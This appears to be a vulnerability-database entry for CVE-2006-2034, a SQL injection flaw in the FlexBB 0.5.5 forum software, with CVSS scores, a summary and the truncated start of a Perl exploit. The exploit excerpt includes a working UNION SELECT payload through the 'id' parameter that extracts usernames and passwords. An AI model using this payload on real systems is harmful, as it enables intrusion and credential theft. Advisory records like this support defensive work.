7.5
CVSSv2

CVE-2006-2034

Published: 26/04/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in function/showprofile.php in FlexBB 0.5.5 allows remote malicious users to execute arbitrary SQL commands, and view all usernames and passwords, via the id parameter to the showprofile page in index.php.

Vulnerable Product Search on Vulmon Subscribe to Product

flexbb flexbb 0.5.5

Exploits

#!/usr/bin/perl use IO::Socket; #FlexBB Exploit [ function/showprofilephp ] Remote SQL Injection # # 1- First Do Login # 2- View This Link :D # # indexphp?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbb_users WHERE id=1/* # #------------------- ...